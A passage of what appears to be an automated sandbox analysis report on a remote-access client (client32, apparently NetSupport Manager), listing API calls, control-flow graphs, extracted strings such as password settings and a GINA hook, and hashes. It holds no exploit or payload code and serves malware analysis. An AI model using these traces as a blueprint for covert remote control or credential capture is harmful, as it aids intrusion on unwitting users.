                                                                                                                                                                                  • Part of subcall function 1116558E: __stricmp_l.LIBCMT ref: 111655CB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileModuleName__stricmp_l_strrchr
                                                                                                                                                                                • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                                                                                                                • API String ID: 1609618855-357498123
                                                                                                                                                                                • Opcode ID: 48764599ec8313d1fa6c1c029c4cdf7cc897f8d1116834746662444e3a9db69f
                                                                                                                                                                                • Instruction ID: 6dd15402a7eb79c0789e25bc58f14fe58cbd6334f89e1d0f8744b7b944579b3b
                                                                                                                                                                                • Opcode Fuzzy Hash: 48764599ec8313d1fa6c1c029c4cdf7cc897f8d1116834746662444e3a9db69f
                                                                                                                                                                                • Instruction Fuzzy Hash: 86120738D052A68FDB16CF64CC84BE8B7F4AB1634CF5000EED9D597601EB72568ACB52
                                                                                                                                                                                Function 6C616BA0 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 273sleepsynchronizationCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2881 6c616ba0-6c616c14 call 6c624710 call 6c605e90 GetTickCount call 6c619210 2888 6c616fb9-6c616fc9 call 6c6228e1 2881->2888 2889 6c616c1a-6c616c1c 2881->2889 2890 6c616c20 2889->2890 2891 6c616c26-6c616c33 GetTickCount 2889->2891 2890->2891 2893 6c616c42-6c616c49 2891->2893 2894 6c616c35-6c616c3d call 6c616940 2891->2894 2897 6c616c50-6c616c57 2893->2897 2898 6c616c4b call 6c6097c0 2893->2898 2894->2893 2900 6c616c66-6c616c6d 2897->2900 2901 6c616c59-6c616c61 Sleep 2897->2901 2898->2897 2903 6c616c82-6c616cc2 call 6c623c10 select 2900->2903 2904 6c616c6f-6c616c7c WaitForSingleObject 2900->2904 2902 6c616f97-6c616f9e 2901->2902 2902->2890 2905 6c616fa4-6c616fb6 call 6c6228e1 2902->2905 2903->2905 2910 6c616cc8-6c616ccb 2903->2910 2904->2903 2911 6c616ce4-6c616ce6 2910->2911 2912 6c616ccd-6c616cdf Sleep 2910->2912 2911->2891 2913 6c616cec-6c616cf9 GetTickCount 2911->2913 2912->2902 2914 6c616d00-6c616d1c 2913->2914 2915 6c616d22 2914->2915 2916 6c616f89-6c616f91 2914->2916 2917 6c616d28-6c616d2b 2915->2917 2916->2902 2916->2914 2918 6c616d3d-6c616d45 2917->2918 2919 6c616d2d-6c616d36 2917->2919 2918->2916 2921 6c616d4b-6c616d95 call 6c623753 call 6c605c90 2918->2921 2919->2917 2920 6c616d38 2919->2920 2920->2916 2926 6c616d9b 2921->2926 2927 6c616f4f-6c616f7c GetTickCount InterlockedExchange call 6c6177e0 2921->2927 2929 6c616dac-6c616ded call 6c609310 2926->2929 2927->2902 2933 6c616f7e-6c616f83 2927->2933 2934 6c616df3-6c616e58 GetTickCount InterlockedExchange call 6c623753 call 6c623c10 2929->2934 2935 6c616f3a-6c616f46 call 6c6030a0 2929->2935 2933->2916 2944 6c616e8b-6c616e99 call 6c6128d0 2934->2944 2945 6c616e5a-6c616e5b 2934->2945 2941 6c616f47-6c616f4c call 6c60a4e0 2935->2941 2941->2927 2952 6c616e9e-6c616ea4 2944->2952 2947 6c616e76-6c616e89 call 6c6094e0 2945->2947 2948 6c616e5d-6c616e74 call 6c606f50 2945->2948 2947->2952 2953 6c616ea7-6c616ebd call 6c6177e0 2948->2953 2952->2953 2958 6c616f25-6c616f38 call 6c6030a0 2953->2958 2959 6c616ebf-6c616f1d InterlockedDecrement SetEvent _memmove call 6c605c90 2953->2959 2958->2941 2964 6c616da0-6c616da6 2959->2964 2965 6c616f23 2959->2965 2964->2929 2965->2927
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 6C616BD5
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 6C616C26
                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 6C616C5B
                                                                                                                                                                                  • Part of subcall function 6C616940: GetTickCount.KERNEL32 ref: 6C616950
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(0000033C,?), ref: 6C616C7C
                                                                                                                                                                                • _memmove.LIBCMT ref: 6C616C93
                                                                                                                                                                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 6C616CB4
                                                                                                                                                                                • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 6C616CD9
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 6C616CEC
                                                                                                                                                                                • _calloc.LIBCMT ref: 6C616D76
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 6C616DF3
                                                                                                                                                                                • InterlockedExchange.KERNEL32(030B2A22,00000000), ref: 6C616E01
                                                                                                                                                                                • _calloc.LIBCMT ref: 6C616E33
                                                                                                                                                                                • _memmove.LIBCMT ref: 6C616E47
                                                                                                                                                                                • InterlockedDecrement.KERNEL32(030B29CA), ref: 6C616EC3
                                                                                                                                                                                • SetEvent.KERNEL32(00000338), ref: 6C616ECF
                                                                                                                                                                                • _memmove.LIBCMT ref: 6C616EF4
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 6C616F4F
                                                                                                                                                                                • InterlockedExchange.KERNEL32(030B296A,-6C64A188), ref: 6C616F60
                                                                                                                                                                                Strings
                                                                                                                                                                                • FALSE, xrefs: 6C616E67
                                                                                                                                                                                • ResumeTimeout, xrefs: 6C616BBA
                                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6C616E62
                                                                                                                                                                                • ReadMessage returned FALSE. Terminating connection, xrefs: 6C616F3A
                                                                                                                                                                                • ProcessMessage returned FALSE. Terminating connection, xrefs: 6C616F25
                                                                                                                                                                                • httprecv, xrefs: 6C616BDD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
                                                                                                                                                                                • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                                                                                                                                • API String ID: 1449423504-919941520
                                                                                                                                                                                • Opcode ID: 19ba70fbe6e5caec7193d9eff69f83c719cba172800c2b3cb5123c0b843ffe78
                                                                                                                                                                                • Instruction ID: 3976bab6f718e7fe8a2c951155f7007d1a4767124963656c28e1f75e016f8b97
                                                                                                                                                                                • Opcode Fuzzy Hash: 19ba70fbe6e5caec7193d9eff69f83c719cba172800c2b3cb5123c0b843ffe78
                                                                                                                                                                                • Instruction Fuzzy Hash: FFB1F3B5E042549FDB20EF29CD84BD973B9EB45309F008099E949E7A40D7B49AC8CF9D
                                                                                                                                                                                Function 110869D0 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2966 110869d0-110869ed call 110869c0 2969 110869ef-110869ff call 11162bb7 2966->2969 2970 11086a00-11086a10 call 111457a0 2966->2970 2975 11086a12-11086a1a 2970->2975 2975->2975 2976 11086a1c-11086a22 2975->2976 2977 11086a23-11086a29 2976->2977 2977->2977 2978 11086a2b-11086a62 LoadLibraryA 2977->2978 2979 11086ac9-11086ade GetProcAddress 2978->2979 2980 11086a64-11086a6b 2978->2980 2983 11086b6c-11086b7d call 11162bb7 2979->2983 2984 11086ae4-11086af3 GetProcAddress 2979->2984 2981 11086a6d-11086abe GetModuleFileNameA call 11081e00 LoadLibraryA 2980->2981 2982 11086ac0-11086ac3 2980->2982 2981->2982 2982->2979 2982->2983 2984->2983 2987 11086af5-11086b04 GetProcAddress 2984->2987 2987->2983 2990 11086b06-11086b15 GetProcAddress 2987->2990 2990->2983 2991 11086b17-11086b26 GetProcAddress 2990->2991 2991->2983 2992 11086b28-11086b37 GetProcAddress 2991->2992 2992->2983 2993 11086b39-11086b48 GetProcAddress 2992->2993 2993->2983 2994 11086b4a-11086b59 GetProcAddress 2993->2994 2994->2983 2995 11086b5b-11086b6a GetProcAddress 2994->2995 2995->2983 2996 11086b7e-11086b93 call 11162bb7 2995->2996
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 11086A5C
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11086A7A
                                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 11086ABC
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086AD7
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 11086AEC
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 11086AFD
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 11086B0E
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 11086B1F
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086B30
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                                                                                                                • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                                                                                                                • API String ID: 2201880244-3035937465
                                                                                                                                                                                • Opcode ID: 6abc65c4e4838324426d91683f0bdbf8815149c0d24aa7dc3b977b7d546e76cd
                                                                                                                                                                                • Instruction ID: dace89b413b7c80efca81dff4c2248eaeba40c207e9952549beb6cb8df15ad3c
                                                                                                                                                                                • Opcode Fuzzy Hash: 6abc65c4e4838324426d91683f0bdbf8815149c0d24aa7dc3b977b7d546e76cd
                                                                                                                                                                                • Instruction Fuzzy Hash: 6551D174A043499BD710DF7ADC80AA6FBE8AF54308B1685AED889C7684DB71E844CF54
                                                                                                                                                                                Function 11074CD0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 294threadtimeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(0000000C), ref: 11074DB5
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(00000024), ref: 11074DBB
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(0000003C), ref: 11074DC1
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(0000DB1C), ref: 11074DCA
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(00000054), ref: 11074DD0
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(0000006C), ref: 11074DD6
                                                                                                                                                                                • _strncpy.LIBCMT ref: 11074E38
                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100), ref: 11074E9F
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00004000,Function_00070F90,00000000,00000000,?), ref: 11074F3C
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11074F43
                                                                                                                                                                                • SetTimer.USER32(00000000,00000000,000000FA,110641A0), ref: 11074F87
                                                                                                                                                                                • std::exception::exception.LIBCMT ref: 11075038
                                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 11075053
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_strncpystd::exception::exceptionwsprintf
                                                                                                                                                                                • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                                                                                                                • API String ID: 860131179-1497550179
                                                                                                                                                                                • Opcode ID: 71051983ddab0765eb2244960b3e686e37e736387672c148764abbf0be878fe5
                                                                                                                                                                                • Instruction ID: be8de8c7dcaf1f52642e817c04f951357ea42bbf71f0edf47656a93d7d63f3b4
                                                                                                                                                                                • Opcode Fuzzy Hash: 71051983ddab0765eb2244960b3e686e37e736387672c148764abbf0be878fe5
                                                                                                                                                                                • Instruction Fuzzy Hash: 0FB1C6B5E40359AFD711CBA4CD84FD9FBF4BB48304F0045A9E64997281EBB0B944CB65
                                                                                                                                                                                Function 11109BC0 Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 216libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                                                • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11109C9A
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11109CA9
                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11109CBB
                                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 11109CF1
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,GrabKM), ref: 11109D1E
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11109D36
                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11109D5B
                                                                                                                                                                                  • Part of subcall function 11110040: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110F55,11110AF0,00000001,00000000,00000000,00000001), ref: 11110057
                                                                                                                                                                                  • Part of subcall function 11110040: CreateThread.KERNEL32(00000000,00000001,00000000,00000000,00000000,0000000C), ref: 1111007A
                                                                                                                                                                                  • Part of subcall function 11110040: WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11027947), ref: 111100A7
                                                                                                                                                                                  • Part of subcall function 11110040: CloseHandle.KERNEL32(?,?,11110F55,11110AF0,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11027947), ref: 111100B1
                                                                                                                                                                                • GetStockObject.GDI32(0000000D), ref: 11109D6F
                                                                                                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 11109D7F
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(0000003C), ref: 11109D9B
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(111F160C), ref: 11109DA6
                                                                                                                                                                                  • Part of subcall function 11108120: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,1118AA56,000000FF), ref: 111081F3
                                                                                                                                                                                  • Part of subcall function 11108120: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 11108242
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,Function_001037D0,00000001,00000000), ref: 11109DE9
                                                                                                                                                                                  • Part of subcall function 1109EE00: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE21
                                                                                                                                                                                  • Part of subcall function 1109EE00: OpenProcessToken.ADVAPI32(00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE28
                                                                                                                                                                                  • Part of subcall function 1109EE00: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1109EE47
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,Function_001037D0,00000001,00000000), ref: 11109E3A
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,Function_001037D0,00000001,00000000), ref: 11109E8F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWaitwsprintf
                                                                                                                                                                                • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                                                                                                                • API String ID: 1112464733-403456261
                                                                                                                                                                                • Opcode ID: 77a3c40093fbdaaba61fb662083b1ccba972a145c5e83dfcb462b9a6c8cb3690
                                                                                                                                                                                • Instruction ID: 1b0d9eedff26640a20888913f96a817a92f989a9fbd8c0972e348e857fd06506
                                                                                                                                                                                • Opcode Fuzzy Hash: 77a3c40093fbdaaba61fb662083b1ccba972a145c5e83dfcb462b9a6c8cb3690
                                                                                                                                                                                • Instruction Fuzzy Hash: 2281DFB1E007599FDB11CFB48998B9AFBF9BB08308F004979E42DD7680E774AA44CB11
                                                                                                                                                                                Function 11139A70 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75BF8400), ref: 11145CA0
                                                                                                                                                                                  • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                                                                                                  • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                                                                                                                • PostMessageA.USER32(00010446,000006CF,00000007,00000000), ref: 11139C4F
                                                                                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                                                • SetWindowTextA.USER32(00010446,00000000), ref: 11139CF7
                                                                                                                                                                                • IsWindowVisible.USER32(00010446), ref: 11139DBC
                                                                                                                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 11139DDC
                                                                                                                                                                                • IsWindowVisible.USER32(00010446), ref: 11139DEA
                                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 11139E18
                                                                                                                                                                                • EnableWindow.USER32(00010446,00000001), ref: 11139E27
                                                                                                                                                                                • IsWindowVisible.USER32(00010446), ref: 11139E78
                                                                                                                                                                                • IsWindowVisible.USER32(00010446), ref: 11139E85
                                                                                                                                                                                • EnableWindow.USER32(00010446,00000000), ref: 11139E99
                                                                                                                                                                                • EnableWindow.USER32(00010446,00000000), ref: 11139DFF
                                                                                                                                                                                  • Part of subcall function 11132120: ShowWindow.USER32(00010446,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000,?,?,?,?,?), ref: 11132144
                                                                                                                                                                                • EnableWindow.USER32(00010446,00000001), ref: 11139EAD
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_strncpy
                                                                                                                                                                                • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                                                                                                                • API String ID: 2586574248-3803836183
                                                                                                                                                                                • Opcode ID: d4bf645ef8ffa5ac4e7abba6c901d2d4c850d0c46a7f2be207279af8fb8d708d
